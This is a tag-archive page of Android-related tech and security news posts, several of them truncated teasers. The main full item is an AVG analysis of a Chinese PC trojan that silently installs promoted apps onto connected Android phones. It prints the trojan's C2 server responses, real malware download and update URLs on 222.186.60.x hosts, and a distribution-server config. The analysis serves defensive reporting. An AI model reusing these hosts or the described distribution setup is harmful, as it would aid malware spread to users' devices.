Tag Archives: Android

Apple Could Offer iMessage App for Android

Although Apple has its own operating system for both desktop (Mac OS X) and iPhone (iOS), the company has always tried to port its in-house applications to other OS platforms.

Apple debuted on its rival mobile OS platform last year with the launch of Apple Music on Android. However, iTunes and Safari has already been made available for both Windows as well as Mac.

Now, the company will

Maru OS — Android ROM that Turns into Debian Linux When Connected to a PC

Good News for Linux Techno Freaks! Do you usually mess with your Android smartphone by trying out the continual ins and outs of various apps and custom ROMs?

Then this news would be a perfect pick for you!

What If, you can effectively carry a Linux computer in your pocket?

Hereby introducing a new Android-based Operating system named “Maru OS” that combine the mobility of a

Latest Windows 10 May Have a Linux Subsystem Hidden Inside

windows10-linux-subsystem
A Few Months Back, Microsoft impressed the world with ‘Microsoft loves Linux‘ announcements, including, development of a custom Linux-based OS for running Azure Cloud Switch and selecting Ubuntu as the operating system for its Cloud-based Big Data services.

Also Read: Microsoft Drops a Cloud Data Center Under the Ocean.

Now, a renowned Windows Hacker and computer expert, who goes by the name ‘WalkingCat’, discovered that the latest version of Windows 10 may have a Linux subsystem secretly installed inside.
According to his tweets, hacker spotted two mysterious files, LXss.sys and LXCore.sys, in the most latest Windows 10 Redstone Build 14251, which are suspected to be part of Microsoft’s Project Astoria.
windows-10-linux-subsystem
Project Astoria, also known as Windows Bridge for Android, is a toolkit that allows running Android apps on Windows 10 Mobile devices.
The naming convention for latest discovered files is very similar to the Android Subsystem files from Project Astoria, i.e. ADss.sys.
So, the “LX” in these name, however, can only be taken for one thing, and that is LINUX, which suggests the Windows 10 will have access to a Linux subsystem also.

Why a Linux Subsystem?

Since Windows 10 has been introduced as a Universal Operating system for all devices, so it might be possible that Microsoft wants to expand Project Astoria from mobile devices to desktop users.
If this comes to be true, adding a Linux subsystem will be beneficial in case Microsoft has plans to offer support for Linux applications, especially servers related technology and software.

Isn’t this exciting?

Stay tuned to The Hacker News Facebook page for further developments on this topic.

PC Malware that silently installs apps on your Android device

The AVG VirusLab was recently exploring the Chinese Android App market and encountered PC based Malware with an interesting side-effect – it was silently (without any notifications to the user) installing apps to Android devices directly connected to the PC.

With a competitive landscape of over 1.9 Million Android apps in the Google Play store alone, and more in other global marketplaces, it’s not hard to see why such tactics are appealing to developers.  Advertising a new app has become increasingly difficult, and costly.

Pre-installation of apps, for example, is one of the most successful ways that developers can get attention and market share, yet it is prohibitively expensive and replies on partnerships with a limited number of handset vendors.

China’s underground black market however appears to be providing a cheaper pre-installation alternative for developers to spread their new apps – through special “alliance” operations such as ones we identified called “cyber café alliance” and “fast step union”.

These alliances offer access to a combination of groups such as hackers, distributors, cyber cafes, phishing websites, servers, etc. They are organized and operated systematically and focus on providing a sales and distribution service.

What we captured and described below, is typical of such “promoting” Trojans – malware designed to assist in the promotion or distribution of software or apps using questionable methods.

This particular malware starts by being downloaded to the computer, but its main purpose has little to do with the PC itself.  Using some clever techniques, it will even “help” you install mobile device drivers if you haven’t already.

From then on, once installed on your PC, whenever you connect your mobile device to your computer it will download an “App promotion list” and install those apps silently to your device.

Download the device’s driver from the server:

 

The server’s response:

{ “platform”:”android”, “service”:”winusb”, “args”:””, “dl”:”http://222.186.60.89:1001/driver/Android/Google/Google64.zip”, “md5″:””, “size”:”” }

Download Adb and other components:

Download the App list:

Below is an example list:

{ "list" : [{
    "dl" : "http://222.186.60.128:1501/522/TTAPKYH_ZX_AG_595_20150826_2.0.0.2.a",
    "pn" : "org.funcity.runrunner.yh.zx",
    "md5" : "9441ce1595fa1d9a4577263d2c30307a"
},

{
    "dl" : "http://222.186.60.128:1501/522/MHLS_AG_906_20151109_1.0.0.1.a",
    "pn" : "com.ltestany.catmouse",
    "md5" : "21b4ba7356f93c4e206455c42a2fc275"
},

{
    "dl" : "http://222.186.60.128:1501/512/BDMSN_ch_white308.a",
    "pn" : "com.tunimei.p8.bai.bdmsn42",
    "md5" : "f732fa12b1754caaf70822fb3dc81dfb"
},

{
    "dl" : "http://222.186.60.128:1501/522/BYDR3JJB_AG_375_20150907_1.0.0.9.a",
    "pn" : "com.you2game.fish.qy.zx1",
   "md5" : "73411890e59a099606122e39fe01c0dc"
},

{
    "dl" : "http://222.186.60.128:1501/512/qqbrowser_6.1.2.1715_22411.a",
    "pn" : "com.tencent.mtt",
    "md5" : "0d8cd219f36e445ef483cf42da5aaca4"
},

{
    "dl" : "http://222.186.60.128:1501/522/com.qihoo.gameunion_41611.a",
    "pn" : "com.qihoo.gameunion",
    "md5" : "dfe5a616507560a49c16831d12b882a0"
},

{
    "dl" : "http://222.186.60.128:1501/522/CFQMJS_AG_610_20150811_1.0.0.3.a",
    "pn" : "com.aiwan.sniper212.zxcps.zx1",
    "md5" : "8446863713d13cb047029f867167f785"
},

{
    "dl" : "http://222.186.60.128:1501/512/Sogou_Explorer_1493.a",
    "pn" : "sogou.mobile.explorer",
    "md5" : "63e3b5c44796ac43fd3eb99d568c6525"
},

{
   "dl" : "http://222.186.60.21:1501/522/xiuba-3.3.0-3262-1-TEST1.a",
    "pn" : "com.xiu8.android.activity",
    "md5" : "721a40131f83bee2874904fb332c8de5"

}]}

 

Use adb.exe to install the Apps:

Apps in the below snapshot are all installed by this malware.

We have noted that this malware is regularly updated. At the time of our research the latest version is 1.7 and this malware checks with a remote server to get the newest version each time it runs.

Query the server to check the version:

http://222.186.60.89:9023/?action=getVersion&pcid=6C78A9C3_%3CMACHINE_NAME%3E&nowVer=1.1&pid=109&subpid=&runas=exe

And the server responded with:

{ "renew" : "0", "version" : "1.7", "dl" : "http://222.186.60.128:1123/setup/appmain.v1.7.exe" }

We found this malware has been actively developed and improved for some time, and below is a record of some of the versions we have observed. It is possible this malware is developed and maintained by a stable team.

But how is this malware distributed to end users’ computers in the first place? The answer is via the alliance model we mentioned above.

In our research, we looked at two cyber café alliances named in Chinese ‘领跑吧网吧联盟 (Leading runner cyber café alliance)’ and ‘快步网盟 (Fast step net union)’ – and we captured some of their distributing servers and their client’s apps:

[File]
kuaibu8=http://4IG7UpAH.adkuai8.com:7000/iniuser/
szicoad=http://4IG7UpAH.adkuai8.com:7000/ico/
wbzzlm=http://4IG7UpAH.adkuai8.com:7000/wbzzlm/

[update]
Startupdate=yes
kuaibu8=kuaibu8
szicoad=szicoad
wbzzlm=wbzzlm

[server]
01=down01.kuaibu8.com:5505
02=down01.kuaibu8.com:5505
03=down01.kuaibu8.com:5505
04=down01.kuaibu8.com:5505
05=down01.kuaibu8.com:5505
06=down01.kuaibu8.com:5505
07=down01.kuaibu8.com:5505
08=down01.kuaibu8.com:5505
09=down01.kuaibu8.com:5505
10=down01.kuaibu8.com:5505

[dllhost]
yewu01=/updata/adclient/ie/ieadd.dll
yewu02=/updata/adclient/cpu/cpuvod.dll
yewu05=/updata/adclient/desk/tequangame.exe
yewu06=/updata/adclient/desk/desk1.exe
yewu09=/updata/adclient/pcfen/app.dll
yewu10=/updata/adclient/sohu/adpc.exe
yewu98=/updata/adclient/baidu/baidu.dll
yewu100=/updata/adclient/online/ipdong.dll
yewu101=/updata/adclient/online/letvst.exe

[yewu01]
zhuyeid=/updata/adclient/baidu/baidu.dll
daohang=/updata/adclient/baidu/baidu.dll

[MD5]
pc.dll=19F7823A7CFE41AC7391BA1C8C402D4B
ieadd.dll=B72A680F93B3EE939FD5ED7818BB28FB
cpuvod.dll=C98A50E044DE1BC9E3E0ED3B7B334231
baidu.dll=37E8DBBF71D48CE87B6D21362A4E2E69
tequangame.exe=A36BCA657DA769E928FC1F746759E66F
desk1.exe=6438B7830D7B110CDF2CDF017AC6EF69
app.dll=5E782960BB0EABB41E756E58381CB5DA
adpc.exe=ED596AB4CABE52680A97073C29BCAC6D
ipdong.dll=5C6F0FEE74493D76F6EBA01BBC741190
2345ieadd.exe=93E32D9C0D647EC2DA4E456398905947
ieadd360.dll=136E8CA0987C754EEBFBCC7164307E78
letvst.exe=6283F091AE24944D487A67FC0C92DD46
wyvip.exe=689DBD3CED0D2A1404DD5ED1E6B06EB6
bdbrowserSetup-7.6.504.2877-1811_10003289.exe=095D58F8A54AC364836A7BA4AA802D25

In order to help protect you from this type of malware, AVG is already detecting them as “Agent5.ZKR” – just one of the many threats we continue to protect you against, on all your devices.

Android has some critical remotely-exploitable security holes. But can you get the patch?

Remote code execution vulnerabilities have been found in the Android operating system, and patches released for Nexus devices.

But what about your smartphone? Is there a patch for you, and can you get your hands on it?

The post Android has some critical remotely-exploitable security holes. But can you get the patch? appeared first on We Live Security.

Google Patches Critical Remotely-exploitable Flaws in Latest Android Update

update-android-mobile
Google has released the February Security Update for Android that patches multiple security vulnerabilities discovered in the latest version of Android operating system.
In total, there were five “critical” security vulnerabilities fixed in the release along with four “high” severity and one merely “moderate” issues.

Remote Code Execution Flaw in WiFi

A set of two critical vulnerabilities has been found in the Broadcom WiFi driver that could be exploited by attackers to perform Remote Code Execution (RCE) on affected Android devices when connected to the same network as the attacker.
The vulnerabilities (CVE-2016-0801 and CVE-2016-0802) can be exploited by sending specially crafted wireless control message packets that can corrupt kernel memory, potentially leading to remote code execution at the kernel level.

“These vulnerabilities can be triggered when the attacker and the victim are associated with the same network,” reads the advisory. “This issue is rated as a Critical severity due to the possibility of remote code execution in the context of the kernel without requiring user interaction.”

Remote Code Execution Flaw in Mediaserver

Another set of two critical security vulnerabilities were discovered in Mediaserver that was targeted last summer by critical Stagefright vulnerabilities and exploits, allowing anyone to compromise an Android device by sending just a specially crafted MMS message.
The recently discovered flaws (CVE-2016-0803 and CVE-2016-0804) in Mediaserver could enable remote code execution (RCE) on affected Android devices through email, web browsing, or MMS files when processing media files.
Moreover, a separate vulnerability called elevation of privilege (CVE-2016-0810) was also discovered in Mediaserver that could be exploited to gain elevated capabilities, including Signature or SignatureOrSystem permissions privileges, that aren’t accessible to third-party apps.
Two Elevation of Privilege vulnerabilities has also been found in Qualcomm components: the Qualcomm Performance Module (CVE-2016-0805) and the Qualcomm Wi-Fi Driver (CVE-2016-0806). Both the flaws, rated as critical, leveraged an attacker to launch further attacks.
Another critically rated bug (CVE-2016-0807) discovered in the Debuggerd component could open the door to execute arbitrary code within the device’s root level. Debuggerd is a software tool used for debugging and analyzing Android crashes.

Other high severity bugs include:

  • An elevation of privilege vulnerability in the Android Wi-Fi component
  • A denial-of-service vulnerability in the Minikin library
  • An information disclosure bug in libmediaplayerservice
The final set of vulnerabilities is an Elevation of Privilege flaw in Setup Wizard that could allow a hacker to bypass the Factory Reset Protection and gain access to the affected device.
All the Security patches are currently made available for Nexus devices only. Google also shared the patches with carrier and manufacturer partners on January 4, but users of other Android devices should have to wait until their devices receive an update.
Nexus device users are advised to patch the flaws by flashing their devices to this new build immediately. Users can also wait for the OTA (Over-the-Air) update that will be out in the next week or so.

Hacking Smartphones Running on MediaTek Processors

A dangerous backdoor has been discovered in the MediaTek processor that could be exploited to hack Android devices remotely.

MediaTek is a Taiwan-based hardware company that manufacture hardware chips and processor used in the smartphones and tablets.

The backdoor was discovered by security researcher Justin Case, who already informed MediaTek about the security issue via Twitter, as

Samsung Get Sued for Failing to Update its Smartphones

One of the world’s largest smartphone makers is being sued by the Dutch Consumers’ Association (DCA) for its lack in providing timely software updates to its Android smartphones.

This doesn’t surprise me, though.

The majority of manufacturers fail to deliver software updates for old devices for years.

However, the consumer protection watchdog in The Netherlands, The Dutch